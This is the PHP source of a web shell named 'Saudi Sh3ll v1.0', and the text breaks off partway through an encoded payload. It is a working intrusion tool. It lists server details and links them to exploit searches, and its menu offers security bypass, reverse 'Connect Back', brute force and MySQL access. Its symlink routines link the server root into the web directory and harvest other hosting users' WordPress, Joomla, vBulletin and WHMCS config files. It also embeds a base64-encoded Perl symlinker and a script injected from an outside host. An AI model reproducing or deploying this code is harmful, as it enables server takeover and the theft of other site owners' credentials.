saudi_sh3ll_v1.0

1. <?
2. ob_start();
3. ?>
4.  
5. <?php
6. ########################################\
7. # #
8. # Saudi Sh3ll v1.0 #
9. # #
10. # by al-swisre #
11. # #
12. ########################################/
13.  
14.  
15. $auth = 1;
16. $name='ec371748dc2da624b35a4f8f685dd122'; // Saudi
17. $pass='ec371748dc2da624b35a4f8f685dd122'; // Saudi
18. if($auth == 1) {
19. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
20. {
21. header('WWW-Authenticate: Basic realm="Saudi Sh3ll v1.0"');
22. header('HTTP/1.0 401 Unauthorized');
23. exit("<b></b>");
24. }
25. }
26. ?>
27.  
28.  
29. <?
30.  
31.  
32.  
33.  
34.  
35.  
36. @set_time_limit(0);
37. @error_reporting(0);
38.  
39.  
40. if ($_GET['sws']== 'phpinfo')
41. {
42.  
43. echo @phpinfo();
44.  
45. exit;
46.  
47. }
48.  
49.  
50.  
51. echo '
52.  
53.  
54. <title>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</title>
55. <meta http-equiv="content=type" content="text/html; charset=utf-8" />
56.  
57.  
58.  
59.  
60.  
61. <style type="text/css">
62. html,body {
63. margin-top: 5px ;
64. padding: 0;
65. outline: 0;
66. }
67.  
68.  
69. body {
70.  
71. direction: ltr;
72. background-color: #000000;
73. color: #CCCCCC;
74. font-family: Tahoma, Arial, sans-serif;
75. font-weight: bold;
76. text-align: center ;
77. }
78.  
79. input,textarea,select{
80. font-weight: bold;
81. color: #FFFFFF;
82. dashed #ffffff;
83. border: 1px dotted #003300;
84. background-color: black;
85. padding: 3px
86. }
87.  
88. input:hover{
89. box-shadow:0px 0px 4px #009900;
90.  
91. }
92. .cont a
93.  
94. {
95.  
96.  
97. text-decoration: none;
98. color: #FFFFFF;
99.  
100.  
101.  
102. }
103. .hedr
104. {
105. font-size:32px;
106. color: #009900;
107. text-shadow: 0px 0px 4px #003300 ;
108.  
109.  
110.  
111. }
112.  
113.  
114.  
115. .td1{
116.  
117.  
118. border: 1px dotted #022B04;
119. padding: 8px;
120. border-radius: 20px;
121. text-shadow: 0px 0px 2px #003300;
122. font-size: 10px;
123. font-family: Tahoma;
124. font-weight: bold;
125.  
126. }
127.  
128. .td1 tr{}
129.  
130. .lol{
131. text-align: left;
132. float: left;
133. background: #990000;
134. }
135. .nop{
136.  
137. width: 180px;
138. text-align: center;
139. font-size: 15px;
140. font-family:Tahoma;
141. color: #003300;
142.  
143.  
144.  
145. }
146. .nop a{
147. text-decoration: none;
148. color: #003300 ;
149. text-shadow: none;
150. width: 80px;
151. padding: 8px
152.  
153.  
154. }
155. .nop a:hover{
156. color: #FFFFFF;
157. box-shadow: 0px 0px 4px #006600 ;
158.  
159.  
160.  
161. }
162. a
163. {
164. text-decoration: none;
165. color: #006600;
166.  
167. }
168.  
169.  
170. .tmp tr td:hover{
171.  
172. box-shadow: 0px 0px 4px #EEEEEE;
173.  
174. }
175. .fot{
176.  
177. font-family:Tahoma, Arial, sans-serif;
178.  
179. font-size: 13pt;
180. }
181.  
182. .ir {
183. color: #FF0000;
184. }
185.  
186. .cont
187. {
188. float:right;
189. color: #FFFFFF;
190. box-shadow: 0px 0px 4px #003300;
191. font-size: 13px;
192. padding: 8px
193.  
194. }
195.  
196. .cont a{
197.  
198. text-decoration: none;
199. color: #FFFFFF;
200. font-family: Tahoma, Arial, sans-serif ;
201. font-size: 13px;
202. text-shadow: 0px 0px 3px ;
203. }
204.  
205. .cont a:hover{
206.  
207.  
208. color: #FF0000 ;
209. text-shadow:0px 0px 3px #FF0000 ;
210.  
211.  
212. }
213.  
214. .cont3
215. {
216. color: #FFFFFF;
217. font-size: 15px;
218. padding: 8px
219.  
220. }
221.  
222. .cont3 a{
223.  
224. text-decoration: none;
225. color: #FFFFFF;
226. font-family: Tahoma, Arial, sans-serif ;
227. font-size: 15px;
228. text-shadow: 0px 0px 3px ;
229. }
230.  
231. .cont3 a:hover{
232.  
233.  
234. color: #FF0000 ;
235. text-shadow:0px 0px 3px #FF0000 ;
236.  
237.  
238. }
239.  
240. .tmp tr td{
241.  
242. border: dotted 1px #003300;
243.  
244. padding: 4px ;
245. font-size: 14px;
246. }
247.  
248. .tmp tr td a {
249. text-decoration: none;
250.  
251. }
252. .cmd
253. {
254.  
255. float:right;
256.  
257. }
258. .tbm{
259. font-size: 14px;
260. }
261.  
262. .tbm tr td{
263. border: dashed 1px #111111;
264.  
265. }
266. .hr{
267.  
268. border: dotted 1px #003300;
269. padding: 5px ;
270. font-size: 13px;
271. color: white ;
272. text-shadow: 0px 0px 3px ;
273. }
274.  
275. .hr2{
276.  
277. border: dotted 1px #003300;
278. padding: 5px ;
279. font-size: 13px;
280. color: red ;
281. text-shadow: 0px 0px 3px ;
282. }
283.  
284. .t3p{
285. width: 100%;
286.  
287. }
288.  
289. .t3p{margin-left: 45px ;}
290.  
291. .t33p{margin-left: 45px ;}
292.  
293.  
294. .t3p tr td{
295.  
296. border: solid 1px #002F00;
297. padding: 2px ;
298. font-size: 13px;
299. text-align: center ;
300. font-weight: bold;
301. margin-left: 20px ;
302.  
303. }
304. .t3p tr td:hover{
305.  
306. box-shadow: 0px 0px 4px #009900;
307.  
308. }
309.  
310.  
311. .info {margin-left: 100px ; }
312.  
313. .info tr td
314. {
315.  
316. border: solid 1px #002F00;
317. padding: 5px ;
318. font-size: 13px;
319. text-align: center ;
320. font-weight: bold;
321.  
322.  
323. }
324. .conn{width: 70%;}
325.  
326. .conn tr td{
327. border: 1px dashed #003300;
328. padding: 5px ;
329. font-size: 13px;
330. text-align: center ;
331. font-weight: bold;
332.  
333. }
334.  
335.  
336. .lol a{
337.  
338. font-size: 10px;
339.  
340. }
341.  
342. .d0n{
343. width: 90%;
344. border-top: solid 1px #003300;
345.  
346. }
347. .d0n tr td{
348. font-weight: bold;
349. color: #FFFFFF;
350. font-family: Tahoma, Arial, sans-serif ;
351. font-size: 13px;
352. margin-left: 110px ;
353.  
354.  
355. }
356. .site
357. {
358.  
359. font-weight: bold;
360. width: 50%;
361. box-shadow: 0px 0px 2px #003300;
362.  
363.  
364. }
365.  
366. .ab
367. {
368. box-shadow: 0px 0px 6px #444444;
369. width: 70%;
370. padding: 10px ;
371.  
372. }
373.  
374. .ab tr td
375. {
376. text-align: center ;
377. font-weight: bold;
378. font-family: Tahoma, Arial, sans-serif ;
379. font-size: 13px;
380. color: white;
381. text-shadow: 0px 0px 2px white ;
382.  
383.  
384. }
385. .ab tr td b
386. {
387. color:red ;
388. text-shadow: 0px 0px 2px red ;
389. }
390. .ab tr td a
391. {
392. color: white;
393. text-shadow: 0px 0px 2px white ;
394.  
395. }
396. .ab tr td a:hover
397. {
398. color:#006600 ;
399. text-shadow: none ;
400. }
401.  
402. .bru
403. {
404. color: #FFFFFF;
405. font-family: Tahoma, Arial, sans-serif ;
406. font-size: 14px;
407. text-shadow: 0px 0px 3px #000000 ;
408.  
409. }
410.  
411. .foter
412. {
413.  
414. color: #003300;
415. font-family: Tahoma, Arial, sans-serif ;
416. font-size: 11px;
417. text-shadow: 0px 0px 3px #000000 ;
418.  
419.  
420. }
421.  
422.  
423.  
424.  
425.  
426.  
427.  
428. </style>
429.  
430. ';
431.  
432. echo '
433.  
434. <table width="95%" cellspacing="0" cellpadding="0" class="tb1" >
435.  
436. <td width="15%" valign="top" rowspan="2">
437. <div class="hedr"> <img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" align="left" alt="Saudi Shell" > </div>
438. </td>
439.  
440. <td height="100" align="left" class="td1" >
441.  
442. ';
443.  
444. $pg = basename(__FILE__);
445.  
446. echo "OS : <b><font color=green>";
447. $safe_mode = @ini_get('safe_mode');
448. $dir = @getcwd();
449. $ip=$_SERVER['REMOTE_ADDR'];
450. $ips=$_SERVER['SERVER_ADDR'];
451. define('SWS','al-swisre');
452.  
453. if ($os)
454. {
455.  
456.  
457. }
458. else
459. {
460. $os = @php_uname();
461. echo $os ;
462. }
463. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0'>Google</a> ]";
464. echo "&nbsp;&nbsp;&nbsp;[ <a style='text-decoration: none; color: #003300; text-shadow: 2px 2px 7px #003300; ' target='_blank' href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve='>exploit-db</a> ]";
465. echo "</font><br /></b>";
466.  
467. echo (($safe_mode)?("safe_mode &nbsp;: <b><font color=red>ON</font></b>"):("safe_mode: <b><font color=green>OFF</font></b>"));
468. echo "<br />disable_functions : ";
469. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{
470.  
471.  
472. echo "<font color=red>$df</font></b>";
473. <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
474. }
475.  
476. echo "<br />Server :&nbsp;<font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
477.  
478. echo "PHP version : <b><font color=green>".@phpversion()."</font></b><br />";
479.  
480.  
481. echo "Id : <font color=green><b>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</font></b><br />";
482.  
483. echo "Pwd : <font color=green><b>".$dir."&nbsp;&nbsp;".wsoPermsColor($dir)."</font></b>&nbsp;&nbsp;[ <a href='$pg'>Home</a> ]<br /><br /><br />";
484.  
485.  
486. echo "Your ip :&nbsp;<font ><b><a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ip' target='_blank' >$ip &nbsp;&nbsp;</a></font></b>
487.  
488. | ip server :&nbsp;<a style='text-decoration: none; color: #FF0000;' href='http://whatismyipaddress.com/ip/$ips' target='_blank' >$ips</a></font></b>
489.  
490. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='$pg?sws=site' target='_blank' >list site</a></font></b>
491. | &nbsp;<a style='text-decoration: none; color: #FF0000;' href='?sws=phpinfo' target='_blank' >phpinfo</a></font></b> |";
492.  
493.  
494.  
495.  
496.  
497.  
498.  
499.  
500.  
501. echo "
502. <br />
503.  
504.  
505.  
506.  
507.  
508.  
509.  
510.  
511. </tr>
512. </table>
513.  
514. <table cellspacing='0' cellpadding='0' style=' margin:9px'>
515.  
516. <tr>
517. <td rowspan='2' class='td1' valign='top' >
518.  
519.  
520. <div class='nop'>
521.  
522. <br /><a href='$pg' >File Manager</a> <br /> <br />
523. <a href='$pg?sws=info' >More info</a> <br /><br />
524. <a href='$pg?sws=ms' >Mysql Manager</a> <br /><br />
525. <a href='$pg?sws=byp' >bypass Security</a> <br /><br />
526. <a href='$pg?sws=sm' >Symlink</a> <br /><br />
527. <a href='$pg?sws=con' >Connect Back</a> <br /><br />
528. <a href='?sws=brt' >BruteForce</a> <br /><br />
529. <a href='$pg?sws=ab' >About Por</a> <br />
530.  
531.  
532.  
533. </div>
534.  
535. ";
536.  
537.  
538.  
539.  
540.  
541. echo '
542.  
543. <td height="444" width="82%" align="center" valign="top">
544.  
545. ';
546.  
547.  
548. if(isset($_REQUEST['sws']))
549. {
550.  
551. switch ($_REQUEST['sws'])
552. {
553.  
554.  
555. ////////////////////////////////////////////////// Symlink //////////////////////////////////////
556.  
557. case 'sm':
558.  
559. $sws = 'al-swisre' ;
560.  
561. $mk = @mkdir('sym',0777);
562.  
563.  
564.  
565. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
566. $f =@fopen ('sym/.htaccess','w');
567.  
568.  
569. @fwrite($f , $htcs);
570.  
571.  
572. $sym = @symlink("/","sym/root");
573.  
574.  
575.  
576.  
577. $pg = basename(__FILE__);
578.  
579.  
580.  
581. echo '<div class="cont3">
582. [ <a href="?sws=sm"> Symlink File </a>]
583.  
584. [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>]
585.  
586. [<a href="?sws=sm&sy=sec"> Domains & Script </a>]
587.  
588. [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]
589. </div><br /><br />' ;
590.  
591. ////////////////////////////////// file ////////////////////////
592. $sws = 'al-swisre' ;
593.  
594. if(isset($_REQUEST['sy']))
595. {
596.  
597. switch ($_REQUEST['sy'])
598. {
599.  
600.  
601.  
602.  
603.  
604. /// Domains + Scripts ///
605.  
606. case 'sec':
607.  
608.  
609. $d00m = @file("/etc/named.conf");
610.  
611. if(!$d00m)
612. {
613. die (" can't read /etc/named.conf");
614. }
615. else
616.  
617. {
618. echo "<div class='tmp'>
619. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
620. foreach($d00m as $dom){
621.  
622. if(eregi("zone",$dom)){
623.  
624. preg_match_all('#zone "(.*)"#', $dom, $domsws);
625.  
626. flush();
627.  
628. if(strlen(trim($domsws[1][0])) > 2){
629.  
630. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
631.  
632. ///////////////////////////////////////////////////////////////////////////////////
633.  
634. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
635. $wpp=@get_headers($wpl);
636. $wp=$wpp[0];
637.  
638. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
639. $wpp2=@get_headers($wp2);
640. $wp12=$wpp2[0];
641.  
642. ///////////////////////////////
643.  
644. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
645. $joo=@get_headers($jo1);
646. $jo=$joo[0];
647.  
648.  
649. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
650. $joo2=@get_headers($jo2);
651. $jo12=$joo2[0];
652.  
653. ////////////////////////////////
654.  
655. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
656. $vbb=@get_headers($vb1);
657. $vb=$vbb[0];
658.  
659. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
660. $vbb2=@get_headers($vb2);
661. $vb12=$vbb2[0];
662.  
663. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
664. $vbb3=@get_headers($vb3);
665. $vb13=$vbb3[0];
666.  
667. /////////////////
668.  
669. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
670. $whh2=@get_headers($wh1);
671. $wh=$whh2[0];
672.  
673. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
674. $whh2=@get_headers($wh2);
675. $wh12=$whh2[0];
676.  
677. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
678. $whh3=@get_headers($wh3);
679. $wh13=$whh3[0];
680.  
681. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
682. $whh5=@get_headers($wh5);
683. $wh15=$whh5[0];
684.  
685. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
686. $whh4=@get_headers($wh4);
687. $wh14=$whh4[0];
688.  
689.  
690.  
691. ////////////////////////////////////////////////////////////////////////////////
692.  
693. ////////// Wordpress ////////////
694.  
695. $pos = strpos($wp, "200");
696. $config="&nbsp;";
697.  
698. if (strpos($wp, "200") == true )
699. {
700. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
701. }
702. elseif (strpos($wp12, "200") == true)
703. {
704. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
705. }
706.  
707. ///////////WHMCS////////
708.  
709. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
710. {
711. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
712.  
713. }
714. elseif (strpos($wh12, "200") == true)
715. {
716. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
717. }
718.  
719. elseif (strpos($wh13, "200") == true)
720. {
721. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
722.  
723. }
724.  
725. ///////// Joomla to 4 ///////////
726.  
727. elseif (strpos($jo, "200") == true)
728. {
729. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
730. }
731.  
732. elseif (strpos($jo12, "200") == true)
733. {
734. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
735. }
736.  
737. //////////vBulletin to 4 ///////////
738.  
739. elseif (strpos($vb, "200") == true)
740. {
741. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
742. }
743.  
744. elseif (strpos($vb12, "200") == true)
745. {
746. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
747. }
748.  
749. elseif (strpos($vb13, "200") == true)
750. {
751. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
752. }
753.  
754. else
755. {
756. continue;
757. }
758.  
759. /////////////////////////////////////////////////////////////////////////////////////
760.  
761.  
762.  
763. $site = $user['name'] ;
764.  
765.  
766.  
767.  
768. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
769. <td>".$config."</td></tr>"; flush();
770. exit;
771.  
772. }
773. }
774. }
775. }
776.  
777.  
778.  
779.  
780. break;
781.  
782.  
783. /// user + domine + symlink ///
784.  
785. case 'sym':
786.  
787. $d00m = @file("/etc/named.conf");
788.  
789. if(!$d00m)
790. {
791. die (" can't read /etc/named.conf");
792. }
793. else
794.  
795. {
796. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
797. foreach($d00m as $dom){
798.  
799. if(eregi("zone",$dom)){
800.  
801. preg_match_all('#zone "(.*)"#', $dom, $domsws);
802.  
803. flush();
804.  
805. if(strlen(trim($domsws[1][0])) > 2){
806.  
807. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
808.  
809.  
810.  
811. $site = $user['name'] ;
812.  
813.  
814. @symlink("/","sym/root");
815.  
816. $site = $domsws[1][0];
817.  
818. $ir = 'ir';
819.  
820. $il = 'il';
821.  
822. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
823. {
824. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
825. }
826.  
827.  
828. echo "
829. <tr>
830.  
831. <td>
832. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
833. </td>
834.  
835.  
836. <td>
837. ".$user['name']."
838. </td>
839.  
840.  
841.  
842.  
843.  
844.  
845. <td>
846. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
847. </td>
848.  
849.  
850. </tr></div> ";
851.  
852.  
853. flush();
854.  
855. }
856. }
857. }
858. }
859.  
860.  
861.  
862.  
863. break;
864.  
865. case 'pl':
866.  
867. if (!is_dir('sa2')){
868.  
869. $mk = @mkdir('sa2',0777);
870.  
871.  
872.  
873. if (is_file('sa2/perl.pl'))
874. {
875.  
876.  
877. echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
878.  
879.  
880. @chmod('sa2/perl.pl',0755);
881.  
882.  
883.  
884.  
885. }
886. else
887. {
888.  
889.  
890.  
891.  
892. $f2 =@fopen ('sa2/perl.pl','w');
893.  
894.  
895. $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdX